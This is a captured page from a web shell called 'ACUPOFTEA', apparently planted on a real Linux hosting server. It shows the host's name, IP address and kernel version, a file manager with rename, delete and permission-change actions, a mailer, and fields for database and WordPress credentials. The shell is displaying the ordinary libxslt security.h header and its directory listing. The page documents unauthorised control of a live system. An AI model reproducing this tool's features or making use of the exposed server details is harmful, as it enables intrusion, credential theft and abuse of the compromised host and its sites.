System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
libxslt
/
216.73.216.6
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
security.h
/* * Summary: interface for the libxslt security framework * Description: the libxslt security framework allow to restrict * the access to new resources (file or URL) from * the stylesheet at runtime. * * Copy: See Copyright for the status of this software. * * Author: Daniel Veillard */ #ifndef __XML_XSLT_SECURITY_H__ #define __XML_XSLT_SECURITY_H__ #include <libxml/tree.h> #include "xsltexports.h" #include "xsltInternals.h" #ifdef __cplusplus extern "C" { #endif /** * xsltSecurityPref: * * structure to indicate the preferences for security in the XSLT * transformation. */ typedef struct _xsltSecurityPrefs xsltSecurityPrefs; typedef xsltSecurityPrefs *xsltSecurityPrefsPtr; /** * xsltSecurityOption: * * the set of option that can be configured */ typedef enum { XSLT_SECPREF_READ_FILE = 1, XSLT_SECPREF_WRITE_FILE, XSLT_SECPREF_CREATE_DIRECTORY, XSLT_SECPREF_READ_NETWORK, XSLT_SECPREF_WRITE_NETWORK } xsltSecurityOption; /** * xsltSecurityCheck: * * User provided function to check the value of a string like a file * path or an URL ... */ typedef int (*xsltSecurityCheck) (xsltSecurityPrefsPtr sec, xsltTransformContextPtr ctxt, const char *value); /* * Module interfaces */ XSLTPUBFUN xsltSecurityPrefsPtr XSLTCALL xsltNewSecurityPrefs (void); XSLTPUBFUN void XSLTCALL xsltFreeSecurityPrefs (xsltSecurityPrefsPtr sec); XSLTPUBFUN int XSLTCALL xsltSetSecurityPrefs (xsltSecurityPrefsPtr sec, xsltSecurityOption option, xsltSecurityCheck func); XSLTPUBFUN xsltSecurityCheck XSLTCALL xsltGetSecurityPrefs (xsltSecurityPrefsPtr sec, xsltSecurityOption option); XSLTPUBFUN void XSLTCALL xsltSetDefaultSecurityPrefs (xsltSecurityPrefsPtr sec); XSLTPUBFUN xsltSecurityPrefsPtr XSLTCALL xsltGetDefaultSecurityPrefs (void); XSLTPUBFUN int XSLTCALL xsltSetCtxtSecurityPrefs (xsltSecurityPrefsPtr sec, xsltTransformContextPtr ctxt); XSLTPUBFUN int XSLTCALL xsltSecurityAllow (xsltSecurityPrefsPtr sec, xsltTransformContextPtr ctxt, const char *value); XSLTPUBFUN int XSLTCALL xsltSecurityForbid (xsltSecurityPrefsPtr sec, xsltTransformContextPtr ctxt, const char *value); /* * internal interfaces */ XSLTPUBFUN int XSLTCALL xsltCheckWrite (xsltSecurityPrefsPtr sec, xsltTransformContextPtr ctxt, const xmlChar *URL); XSLTPUBFUN int XSLTCALL xsltCheckRead (xsltSecurityPrefsPtr sec, xsltTransformContextPtr ctxt, const xmlChar *URL); #ifdef __cplusplus } #endif #endif /* __XML_XSLT_SECURITY_H__ */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
..
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
attributes.h
text/x-c
930 B
-rw-r--r--
2015-05-10 02:11:29
documents.h
text/x-c
2.64 KB
-rw-r--r--
2015-05-10 02:11:29
extensions.h
text/x-c
6.74 KB
-rw-r--r--
2012-09-04 02:26:23
extra.h
text/x-c
1.6 KB
-rw-r--r--
2017-08-29 11:20:04
functions.h
text/x-c
1.96 KB
-rw-r--r--
2015-05-10 02:11:29
imports.h
text/x-c
1.8 KB
-rw-r--r--
2015-05-10 02:11:29
keys.h
text/x-c
1.13 KB
-rw-r--r--
2015-05-10 02:11:29
namespaces.h
text/x-c
1.63 KB
-rw-r--r--
2015-05-10 02:11:30
numbersInternals.h
text/x-c
1.97 KB
-rw-r--r--
2015-05-10 02:11:30
pattern.h
text/x-c
1.95 KB
-rw-r--r--
2012-09-04 02:26:23
preproc.h
text/x-c
892 B
-rw-r--r--
2015-05-10 02:11:30
security.h
text/x-c
2.59 KB
-rw-r--r--
2015-05-10 02:11:30
templates.h
text/x-c
2.21 KB
-rw-r--r--
2015-05-10 02:11:30
transform.h
text/x-c
6.18 KB
-rw-r--r--
2015-02-27 06:00:23
variables.h
text/x-c
3.07 KB
-rw-r--r--
2025-08-26 08:55:04
xslt.h
text/x-c
1.92 KB
-rw-r--r--
2015-05-10 02:11:30
xsltInternals.h
text/x-c
56.14 KB
-rw-r--r--
2025-08-26 08:55:04
xsltconfig.h
text/x-c
3.5 KB
-rw-r--r--
2025-08-26 08:55:13
xsltexports.h
text/plain
3.35 KB
-rw-r--r--
2009-05-12 06:29:34
xsltlocale.h
text/x-c
1.51 KB
-rw-r--r--
2017-10-26 07:55:47
xsltutils.h
text/x-c
8.49 KB
-rw-r--r--
2025-08-26 08:55:04
~ ACUPOFTEA - mail.ontime-ae.com